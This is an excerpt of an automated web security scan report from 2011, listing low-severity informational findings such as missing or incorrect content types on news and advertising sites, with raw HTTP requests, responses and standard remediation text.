Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:30 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.16. http://l1.zedo.com/log/p.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l1.zedo.com
Path:   /log/p.html

Request

GET /log/p.html HTTP/1.1
Host: l1.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9e27c2b7c1bfe1a0267a93d84e586aa6:1210912694"
Last-Modified: Fri, 16 May 2008 04:38:14 GMT
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:22:48 GMT
Content-Length: 1592
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"

<!-- Copyright (c) 2000-2007 ZEDO Inc. All Rights Reserved. -->
<HTML><BODY>
<SCRIPT LANGUAGE="JavaScript">
var zi2=new Array();var zc2=0;
function zB0(zv1){
if(zc2<1){
var ze2=''+window.locati
...[SNIP]...

28.17. http://links.industrybrains.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://links.industrybrains.com
Path:   /click

Request

GET /click HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 04 Sep 2011 01:22:48 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:22:48 GMT
Content-Length: 77

<html><body>Invalid request<!-- Error: Missing parameter pr --></body></html>

28.18. http://nextelonline.nextel.com/tl/set_tl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Request

GET /tl/set_tl.html?105E1B5AD68B10D605E2BDF5FE0A4306 HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 04 Sep 2011 00:45:24 GMT
Content-type: text/html
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

28.19. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:17 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2173

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

28.20. http://pbid.pro-market.net/engine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Request

GET /engine HTTP/1.1
Host: pbid.pro-market.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app1.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:23:11 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><H3> Error In Request 833 </H3></body></html>

28.21. http://pixel.quantserve.com/seg/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/r

Request

GET /seg/r HTTP/1.1
Host: pixel.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 01:23:21 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.22. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Request

GET /2/nbc.com/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 230
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var xaval = 'n';
document.write('<iframe src="http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html?xa='+xaval+'" width=0 heig
...[SNIP]...

28.23. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /assets/olsvideo/mediaPlayer.html

Request

GET /assets/olsvideo/mediaPlayer.html HTTP/1.1
Host: shop2.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 01:23:54 GMT
Content-type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>Sprint Media Player</title>
       <script type="text/javascript">
           function Querystring(qs) { // optionally p
...[SNIP]...

28.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:07 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

28.25. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriberservices.mcclatchy.com
Path:   /char/transactiontype.asp

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:24:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15086
Content-Type: text/html
Cache-control: private


<html>
<head>
   <LINK rel="stylesheet" type="text/css" href="SSheet1.css">
   <TITLE></TITLE>
<script LANGUAGE="JavaScript">
function WM_netscapeCssFix()
{
/*
Source: Webmonkey Code Lib
...[SNIP]...

28.26. http://video.od.visiblemeasures.com/log

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /log

Request

GET /log?m=USM2WGACdk8oUH9yAQgEc3sGCHQKAAp2E1RVJU1AQFwPAGYCcXcHBQBwcgh3BQQJcQVkN0EEAHBzBAl%2FBQYLdA0DBWJdVEZYFwUFQFU0CgATMCNXIVhdcCUJcmYAfAZzcAAOcAMACnMAAwl3CgYUTEFVMQ1wBHF2DHN1f3UHBn9xBnV6c38IdntyDX9zB3oFAgF0AQ13cH92A3oDEiJWRFRnd381VkAEcRItIVhcUjcLVQR3AQYNdAwFAXcIDQcLFwMCARIiVkRUZ3d%2FNUBYBHIEcmYAfARzchddJ0ZWHXFzQlQ3BFZaWEBcLERAI1hSRicwTyBFV1wvUTAqUR9aJjsMWnJUAQp9BFFScA9RAwhXACEBByMHAAR7IAAjBgUOIwFkIEYEAHBzBAl%2FBQYLdQ0HAg%3D%3D&p=1 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 00:44:53 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Tue, 01 Mar 2011 06:21:43 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1

28.27. http://www.charlotteobserver.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /search/

Request

GET /search/ HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez=
...[SNIP]...

28.28. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/setRemoteDomainCookies.html

Request

GET /hosted/util/setRemoteDomainCookies.html?xa=n HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://premium.mookie1.com/2/nbc.com/ac@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 1122
Cache-Control: max-age=300
Expires: Sun, 04 Sep 2011 00:55:25 GMT
Date: Sun, 04 Sep 2011 00:50:25 GMT
Connection: close

<script>
function sc(cd,cn,ch){
if(cn==undefined){
return false;
}
   var expires = '';
if(ch!=undefined){
       var d = new Date;
       d.setHours(d.getHours()+ch);
       ex
...[SNIP]...

28.29. http://www.newslibrary.com/nlsearch.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newslibrary.com
Path:   /nlsearch.asp

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:21 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
Set-Cookie: ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;
Connection: close
Content-Type: text/html
Content-Length: 1910


<html><head>
<title>NewsLibrary Error</title>
</head>
<body>
<map name="FPMap0">
<area href="/nlsite/faq.htm" shape="rect" coords="386, 20, 429, 37">
<area href="/nlsite/about.htm" shape="rect" coor
...[SNIP]...

28.30. http://www.reuters.com/resources/r/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /resources/r/

Request

GET /resources/r/ HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
Vary: Accept-Encoding
Content-Length: 16
Connection: close
Content-Type: text/html

Illegal: d - msg

28.31. http://www.usatoday.com/community/profile.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /community/profile.htm

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30689
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQSTDCBD=PLPNKDFBOKBABODIEEPNMHMM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="35211456" egiordan --><script
...[SNIP]...

28.32. http://www.usatoday.com/marketing/feedback.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/feedback.htm

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35984
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="" --><!-- /EdSysObj -->
<sc
...[SNIP]...

28.33. http://www.usatoday.com/marketing/questions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/questions.htm

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79083
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:34 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...

29. Content type incorrectly stated
There are 32 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


29.1. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 01:21:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.2. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

Summary

Severity:   Information
Confidence:   Firm
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain script.

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;art
...[SNIP]...

29.3. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.reuters.com
Path:   /wp-content/widgets/rtrxtra/rac.php

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain JSON.

Request

GET /wp-content/widgets/rtrxtra/rac.php HTTP/1.1
Host: blogs.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Cachetype: Cached-with-(null)
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

[{ "id": "365484", "author": "DSI", "comment": "Turkey didn't send any ships to Gaza. It was an independent ship run by some humanitarian foundation. Case here is not the Israil attacking Turkish ship
...[SNIP]...

29.4. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/reuters/rbox.en.4-8-2-1-48560.json

Issue detail

The response's Content-type statement says that it contains plain text. However, it actually appears to contain CSS.

Request

GET /libtrc/reuters/rbox.en.4-8-2-1-48560.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:43:57 GMT
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Last-Modified: Thu, 25 Aug 2011 11:22:46 GMT
ETag: "3fd20-284-4ab52a5e8ad80"
Content-Language: en
Accept-Ranges: bytes
Cache-Control: private, max-age=31536000
Age: 825669
Expires: Fri, 24 Aug 2012 11:22:48 GMT
Content-Length: 644
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...

29.5. http://d3fd89.r.axf8.net/mr/e.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d3fd89.r.axf8.net
Path:   /mr/e.gif

Issue detail

The response's Content-type statement says that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A207062696683182%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ACharlotte%20Observer%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 41
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:44:05 GMT

gomez.b3(0,0.01);if(gomez.n0)gomez.n0(1);

29.6. http://espn.go.com/dallas/ncf/preview

Summary

Severity:   Information
Confidence:   Firm
Host:   http://espn.go.com
Path:   /dallas/ncf/preview

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain plain text.

Request

GET /dallas/ncf/preview HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 04 Sep 2011 01:22:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N723
Cache-Expires: Sun, 04 Sep 2011 01:23:27 GMT
Content-Length: 4
Connection: close

null

29.7. http://goku.brightcove.com/1pix.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goku.brightcove.com
Path:   /1pix.gif

Issue detail

The response's Content-type statement says that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1315097126249&playerURL=http%3A//s3.cinesport.com/players/charlotteobservergeneric.html&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&dcsref=http%3A//cdn.cinesport.com/container.html%3Fid%3Dcharlotteobservergeneric&os=Windows%20Server%202008%20R2&playerId=1055201224001&playerTag=&publisherId=315980433&time=1987&affiliateId=&mem=66220&sourceId=315980433&dcsuri=/viewer/player_load HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
